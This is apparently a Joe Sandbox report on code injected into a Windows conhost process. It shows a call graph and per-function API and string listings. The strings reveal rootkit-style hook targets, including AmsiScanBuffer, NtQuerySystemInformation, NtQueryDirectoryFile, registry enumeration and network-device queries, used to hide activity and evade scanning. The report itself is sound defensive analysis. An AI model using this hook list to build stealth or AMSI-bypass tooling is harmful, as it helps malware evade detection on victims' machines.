8699->8701 8700->8698 8702 2a5af36feab 8700->8702 8701->8700 8054 2a5af364320 8057 2a5af36426d 8054->8057 8055 2a5af3642d7 8056 2a5af3642bd VirtualQuery 8056->8055 8056->8057 8057->8055 8057->8056 8058 2a5af364322 GetLastError 8057->8058 8058->8057 8440 2a5af37479d 8443 2a5af36af34 8440->8443 8444 2a5af36af4e 8443->8444 8446 2a5af36af9b 8443->8446 8445 2a5af369324 _CreateFrameInfo 9 API calls 8444->8445 8444->8446 8445->8446 8059 2a5af368f0c 8066 2a5af36946c 8059->8066 8062 2a5af368f19 8068 2a5af369474 8066->8068 8069 2a5af3694a5 8068->8069 8070 2a5af368f15 8068->8070 8083 2a5af369d28 8068->8083 8071 2a5af3694b4 __vcrt_uninitialize_locks DeleteCriticalSection 8069->8071 8070->8062 8072 2a5af369400 8070->8072 8071->8070 8097 2a5af369bfc 8072->8097 8088 2a5af369aac 8083->8088 8086 2a5af369d68 8086->8068 8087 2a5af369d73 InitializeCriticalSectionAndSpinCount 8087->8086 8089 2a5af369b96 8088->8089 8095 2a5af369af0 __vcrt_InitializeCriticalSectionEx 8088->8095 8089->8086 8089->8087 8090 2a5af369b1e 
LoadLibraryExW 8092 2a5af369b3f GetLastError 8090->8092 8093 2a5af369bbd 8090->8093 8091 2a5af369bdd GetProcAddress 8091->8089 8092->8095 8093->8091 8094 2a5af369bd4 FreeLibrary 8093->8094 8094->8091 8095->8089 8095->8090 8095->8091 8096 2a5af369b61 LoadLibraryExW 8095->8096 8096->8093 8096->8095 8098 2a5af369aac __vcrt_InitializeCriticalSectionEx 5 API calls 8097->8098 8099 2a5af369c21 TlsAlloc 8098->8099 8703 2a5af36820c 8710 2a5af368f34 8703->8710 8706 2a5af368219 8711 2a5af369340 _CreateFrameInfo 9 API calls 8710->8711 8712 2a5af368215 8711->8712 8712->8706 8713 2a5af36c288 8712->8713 8714 2a5af36cb10 __free_lconv_mon 13 API calls 8713->8714 8715 2a5af368222 8714->8715 8715->8706 8716 2a5af368f48 8715->8716 8719 2a5af3692dc 8716->8719 8718 2a5af368f51 8718->8706 8720 2a5af369302 8719->8720 8721 2a5af3692ed 8719->8721 8720->8718 8722 2a5af369c8c _CreateFrameInfo 6 API calls 8721->8722 8723 2a5af3692f2 8722->8723 8725 2a5af369cd4 8723->8725 8726 2a5af369aac __vcrt_InitializeCriticalSectionEx 5 API calls 8725->8726 8727 2a5af369d02 8726->8727 8728 2a5af369d0c 8727->8728 8729 2a5af369d14 TlsSetValue 8727->8729 8728->8720 8729->8728 8730 2a5af374611 __scrt_dllmain_exception_filter 8101 2a5af36c510 8102 2a5af36c518 8101->8102 8103 2a5af36c545 8102->8103 8105 2a5af36c574 8102->8105 8106 2a5af36c59f 8105->8106 8107 2a5af36c5a3 8106->8107 8108 2a5af36c582 DeleteCriticalSection 8106->8108 8107->8103 8108->8106 9279 2a5af365c8d 9280 2a5af365c94 9279->9280 9281 2a5af365cfb 9280->9281 9282 2a5af365d77 VirtualProtect 9280->9282 9283 2a5af365da3 GetLastError 9282->9283 9284 2a5af365db1 9282->9284 9283->9284 8447 2a5af36cbfc 8452 2a5af36f3a0 8447->8452 8449 2a5af36cc05 8450 2a5af36cb10 __free_lconv_mon 13 API calls 8449->8450 8451 2a5af36cc22 __vcrt_uninitialize_ptd 8449->8451 8450->8451 8453 2a5af36f3b5 8452->8453 8454 2a5af36f3b1 8452->8454 8453->8454 8455 2a5af36ef88 9 API calls 8453->8455 8454->8449 8455->8454 8731 2a5af37387c 8732 2a5af3738b4 __GSHandlerCheckCommon 
8731->8732 8733 2a5af3738e0 8732->8733 8735 2a5af369a24 8732->8735 8736 2a5af369324 _CreateFrameInfo 9 API calls 8735->8736 8737 2a5af369a4e 8736->8737 8738 2a5af369324 _CreateFrameInfo 9 API calls 8737->8738 8739 2a5af369a5b 8738->8739 8740 2a5af369324 _CreateFrameInfo 9 API calls 8739->8740 8741 2a5af369a64 8740->8741 8741->8733 8456 2a5af3641f9 8459 2a5af364146 8456->8459 8457 2a5af3641b0 8458 2a5af364196 VirtualQuery 8458->8457 8458->8459 8459->8457 8459->8458 8460 2a5af3641ca VirtualAlloc 8459->8460 8460->8457 8461 2a5af3641fb GetLastError 8460->8461 8461->8457 8461->8459 8462 2a5af365ff9 8463 2a5af366000 VirtualProtect 8462->8463 8464 2a5af366029 GetLastError 8463->8464 8465 2a5af365f10 8463->8465 8464->8465 9285 2a5af3746f5 9286 2a5af369324 _CreateFrameInfo 9 API calls 9285->9286 9287 2a5af37470d 9286->9287 9288 2a5af369324 _CreateFrameInfo 9 API calls 9287->9288 9289 2a5af374728 9288->9289 9290 2a5af369324 _CreateFrameInfo 9 API calls 9289->9290 9291 2a5af37473c 9290->9291 9292 2a5af369324 _CreateFrameInfo 9 API calls 9291->9292 9293 2a5af37477e 9292->9293 8109 2a5af36c180 8112 2a5af36bf38 8109->8112 8119 2a5af36bf00 8112->8119 8117 2a5af36bebc 13 API calls 8118 2a5af36bf6b 8117->8118 8120 2a5af36bf15 8119->8120 8121 2a5af36bf10 8119->8121 8123 2a5af36bf1c 8120->8123 8122 2a5af36bebc 13 API calls 8121->8122 8122->8120 8124 2a5af36bf2c 8123->8124 8125 2a5af36bf31 8123->8125 8126 2a5af36bebc 13 API calls 8124->8126 8125->8117 8126->8125 9294 2a5af36b500 9299 2a5af36c558 EnterCriticalSection 9294->9299 9300 2a5af362300 9301 2a5af362331 9300->9301 9302 2a5af362412 9301->9302 9303 2a5af362447 9301->9303 9309 2a5af362355 9301->9309 9304 2a5af3624bb 9303->9304 9305 2a5af36244c 9303->9305 9304->9302 9308 2a5af3635c8 11 API calls 9304->9308 9317 2a5af3635c8 GetProcessHeap HeapAlloc 9305->9317 9307 2a5af36238d StrCmpNIW 9307->9309 9308->9302 9309->9302 9309->9307 9311 2a5af361d30 9309->9311 9312 2a5af361d57 GetProcessHeap HeapAlloc 9311->9312 9313 2a5af361db4 
9311->9313 9312->9313 9314 2a5af361d92 9312->9314 9313->9309 9315 2a5af361cfc 2 API calls 9314->9315 9316 2a5af361d9a GetProcessHeap HeapFree 9315->9316 9316->9313 9320 2a5af36361b 9317->9320 9318 2a5af3636d9 GetProcessHeap HeapFree 9318->9302 9319 2a5af3636d4 9319->9318 9320->9318 9320->9319 9321 2a5af363666 StrCmpNIW 9320->9321 9322 2a5af361d30 6 API calls 9320->9322 9321->9320 9322->9320 8466 2a5af36b7ea 8467 2a5af36c2f4 14 API calls 8466->8467 8468 2a5af36b7ef 8467->8468 8469 2a5af36b815 GetModuleHandleW 8468->8469 8470 2a5af36b85f 8468->8470 8469->8470 8474 2a5af36b822 8469->8474 8483 2a5af36b6f8 8470->8483 8474->8470 8478 2a5af36b904 GetModuleHandleExW 8474->8478 8479 2a5af36b938 GetProcAddress 8478->8479 8482 2a5af36b94a 8478->8482 8479->8482 8480 2a5af36b95b FreeLibrary 8481 2a5af36b962 8480->8481 8481->8470 8482->8480 8482->8481 8495 2a5af36c558 EnterCriticalSection 8483->8495 8496 2a5af3627e8 8498 2a5af362867 8496->8498 8497 2a5af362998 8498->8497 8499 2a5af3628c9 GetFileType 8498->8499 8500 2a5af3628d7 StrCpyW 8499->8500 8501 2a5af3628ed 8499->8501 8502 2a5af3628fc 8500->8502 8512 2a5af361ad4 GetFinalPathNameByHandleW 8501->8512 8506 2a5af36299d 8502->8506 8510 2a5af362906 8502->8510 8504 2a5af363f88 StrCmpNIW 8504->8506 8505 2a5af363f88 StrCmpNIW 8505->8510 8506->8497 8506->8504 8507 2a5af363708 4 API calls 8506->8507 8508 2a5af361dd4 2 API calls 8506->8508 8507->8506 8508->8506 8510->8497 8510->8505 8517 2a5af363708 StrCmpIW 8510->8517 8521 2a5af361dd4 8510->8521 8513 2a5af361b3d 8512->8513 8514 2a5af361afe StrCmpNIW 8512->8514 8513->8502 8514->8513 8515 2a5af361b18 lstrlenW 8514->8515 8515->8513 8516 2a5af361b2a StrCpyW 8515->8516 8516->8513 8518 2a5af36373a StrCpyW StrCatW 8517->8518 8519 2a5af363751 PathCombineW 8517->8519 8520 2a5af36375a 8518->8520 8519->8520 8520->8510 8522 2a5af361deb 8521->8522 8523 2a5af361df4 8521->8523 8524 2a5af361530 2 API calls 8522->8524 8523->8510 8524->8523 8127 2a5af365974 8128 2a5af36597a 8127->8128 8139 2a5af367fa0 
8128->8139 8133 2a5af365a77 8135 2a5af365bfd 8133->8135 8138 2a5af3659de 8133->8138 8152 2a5af367b80 8133->8152 8134 2a5af365cfb 8135->8134 8136 2a5af365d77 VirtualProtect 8135->8136 8137 2a5af365da3 GetLastError 8136->8137 8136->8138 8137->8138 8140 2a5af367fab 8139->8140 8141 2a5af3659bd 8140->8141 8142 2a5af36b470 __free_lconv_mon 2 API calls 8140->8142 8143 2a5af367fca 8140->8143 8141->8138 8148 2a5af364400 8141->8148 8142->8140 8144 2a5af367fd5 8143->8144 8158 2a5af3687b8 8143->8158 8162 2a5af3687d8 8144->8162 8149 2a5af36441d 8148->8149 8151 2a5af36448c 8149->8151 8171 2a5af364670 8149->8171 8151->8133 8153 2a5af367bc7 8152->8153 8196 2a5af367950 8153->8196 8156 2a5af368070 _invalid_parameter_noinfo 8 API calls 8157 2a5af367bf1 8156->8157 8157->8133 8159 2a5af3687c6 std::bad_alloc::bad_alloc 8158->8159 8166 2a5af369178 8159->8166 8161 2a5af3687d7 8163 2a5af3687e6 std::bad_alloc::bad_alloc 8162->8163 8164 2a5af369178 Concurrency::cancel_current_task 2 API calls 8163->8164 8165 2a5af367fdb 8164->8165 8167 2a5af369197 8166->8167 8168 2a5af3691e2 RaiseException 8167->8168 8169 2a5af3691c0 RtlPcToFileHeader 8167->8169 8168->8161 8170 2a5af3691d8 8169->8170 8170->8168 8172 2a5af364694 8171->8172 8174 2a5af3646b7 8171->8174 8172->8174 8185 2a5af364120 8172->8185 8175 2a5af3646ed 8174->8175 8191 2a5af364250 8174->8191 8176 2a5af36471d 8175->8176 8179 2a5af364250 2 API calls 8175->8179 8177 2a5af364753 8176->8177 8181 2a5af364120 3 API calls 8176->8181 8180 2a5af36476f 8177->8180 8182 2a5af364120 3 API calls 8177->8182 8179->8176 8183 2a5af36478b 8180->8183 8184 2a5af364250 2 API calls 8180->8184 8181->8177 8182->8180 8183->8151 8184->8183 8188 2a5af364141 8185->8188 8186 2a5af3641b0 8186->8174 8187 2a5af364196 VirtualQuery 8187->8186 8187->8188 8188->8186 8188->8187 8189 2a5af3641ca VirtualAlloc 8188->8189 8189->8186 8190 2a5af3641fb GetLastError 8189->8190 8190->8186 8190->8188 8192 2a5af364268 8191->8192 8193 2a5af3642bd VirtualQuery 8192->8193 8194 2a5af3642d7 
8192->8194 8195 2a5af364322 GetLastError 8192->8195 8193->8192 8193->8194 8194->8175 8195->8192 8197 2a5af36796b 8196->8197 8198 2a5af367981 SetLastError 8197->8198 8199 2a5af36798f 8197->8199 8198->8199 8199->8156 8750 2a5af368672 8751 2a5af3690c0 __std_exception_copy 38 API calls 8750->8751 8752 2a5af36869d 8751->8752 8200 2a5af36f370 VirtualProtect 8753 2a5af36f870 8754 2a5af36f8a0 8753->8754 8756 2a5af36f8c7 8753->8756 8755 2a5af36cb10 __free_lconv_mon 13 API calls 8754->8755 8754->8756 8760 2a5af36f8b4 8754->8760 8755->8760 8757 2a5af36f99c 8756->8757 8776 2a5af36c558 EnterCriticalSection 8756->8776 8761 2a5af36fab3 8757->8761 8763 2a5af36fa03 8757->8763 8769 2a5af36f9ca 8757->8769 8758 2a5af36f904 8760->8756 8760->8758 8762 2a5af36f949 8760->8762 8764 2a5af36fac0 8761->8764 8778 2a5af36c5ac LeaveCriticalSection 8761->8778 8765 2a5af36d1f4 __free_lconv_mon 13 API calls 8762->8765 8773 2a5af36fa61 8763->8773 8777 2a5af36c5ac LeaveCriticalSection 8763->8777 8768 2a5af36f94e 8765->8768 8771 2a5af36d04c _invalid_parameter_noinfo 38 API calls 8768->8771 8769->8763 8772 2a5af36cab0 _invalid_parameter_noinfo 14 API calls 8769->8772 8770 2a5af36cab0 14 API calls _invalid_parameter_noinfo 8770->8773 8771->8758 8774 2a5af36f9f3 8772->8774 8773->8770 8775 2a5af36cab0 _invalid_parameter_noinfo 14 API calls 8774->8775 8775->8763 8525 2a5af362ff0 8526 2a5af363061 8525->8526 8527 2a5af363384 8526->8527 8528 2a5af36308d GetModuleHandleA 8526->8528 8529 2a5af3630b1 8528->8529 8530 2a5af36309f GetProcAddress 8528->8530 8529->8527 8531 2a5af3630d8 StrCmpNIW 8529->8531 8530->8529 8531->8527 8537 2a5af3630fd 8531->8537 8532 2a5af361a30 6 API calls 8532->8537 8533 2a5af3632b9 lstrlenW 8533->8537 8534 2a5af36320f lstrlenW 8534->8537 8535 2a5af361cfc StrCmpIW StrCmpW 8535->8537 8536 2a5af363f88 StrCmpNIW 8536->8537 8537->8527 8537->8532 8537->8533 8537->8534 8537->8535 8537->8536 9326 2a5af36f6dc 9327 2a5af36f6e8 9326->9327 9329 2a5af36f70f 9327->9329 9330 2a5af371c0c 9327->9330 9331 

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 3b4f300a9b6db61ca495790df6a14bafc6475139842ba37656d7c6d50d160790
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 3B519BA3310E6AA7FB8CEB65FC487C77720A702788F9187139549025679E7CC25EC392

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 74041ea197c40af10377fcbbaa2e2dba22ea61593caa7f528941ec8b06b6d436
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: DFD04212722E2197FB8CAB11F8983563261AB66B41F840617850A022A69E2C955D9342

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameW.KERNEL32 ref: 000002A5AF363A35
                                            • PathFindFileNameW.SHLWAPI ref: 000002A5AF363A44
                                              • Part of subcall function 000002A5AF363F88: StrCmpNIW.SHLWAPI(?,?,?,000002A5AF36272F), ref: 000002A5AF363FA0
                                              • Part of subcall function 000002A5AF363EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363EDB
                                              • Part of subcall function 000002A5AF363EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363F0E
                                              • Part of subcall function 000002A5AF363EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363F2E
                                              • Part of subcall function 000002A5AF363EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363F47
                                              • Part of subcall function 000002A5AF363EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363F68
                                            • CreateThread.KERNELBASE ref: 000002A5AF363A8B
                                              • Part of subcall function 000002A5AF361E74: GetCurrentThread.KERNEL32 ref: 000002A5AF361E7F
                                              • Part of subcall function 000002A5AF361E74: CreateThread.KERNELBASE ref: 000002A5AF362043
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362049
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362055
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362061
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF36206D
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362079
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362085
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction ID: 6f5d9a531735fbfa10f934f86c6fee7f1753f7bd3e0309f26d4d482ba7c53596
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: B0114023B20EA183FBECA721F54D36B22A0A757745F50436BA506823D3DF7CC45C9642
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 6ffb68d5cb71dc107652523e8647b7231f583fa380f8d3b4b5355e44697fbb6d
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: ED912573B01A6087DB68DF29E408B6AB391F745B98F54C3239E4A0778ADE38D816C701

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 000002A5AF361724: GetProcessHeap.KERNEL32 ref: 000002A5AF36172F
                                              • Part of subcall function 000002A5AF361724: HeapAlloc.KERNEL32 ref: 000002A5AF36173E
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF3617AE
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF3617DB
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF3617F5
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF361815
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF361830
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF361850
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF36186B
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF36188B
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF3618A6
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF3618C6
                                            • SleepEx.KERNELBASE ref: 000002A5AF361BDF
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF3618E1
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF361901
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF36191C
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF36193C
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF361957
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF361977
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF361992
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF36199C
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: 991014dff11174e476bec32493bcdda1279589ddef9231e35410e1579aedda04
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: E0310F67300E6143EB98BB27F55836F73A4AB46FC0F245A238F0987297DE14C8588256

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 5ee23c1e581e72a48f2f8e8175e9a4eb0c626b0b446672dee2f5188ce553a6f4
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 49B16B23310AE083EBAC9F26E4087ABA3A4F746B88F545257EE0953796DF35CD48C341
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: ea12458fef4abb1a4077725d688c9fc35c232cd066aa2c49990d0e7a85352d53
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: E0310662315A9086EBA89F60E8443EA7364F789748F44412BDA4E47A9ADF78C6488711
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 1500eac117c163d55e1cbc2b84dd8e48126512dba1a735de6b3622cb391ff117
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 30415A37314F9086E7A8CB24E8443AB73A4F78A794F500217EA9D47B9ADF78C559CB01
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: f03a222bf1c7bcd09742109b5adbb48b23e9054ab4a8f79768959b9909eb8ca3
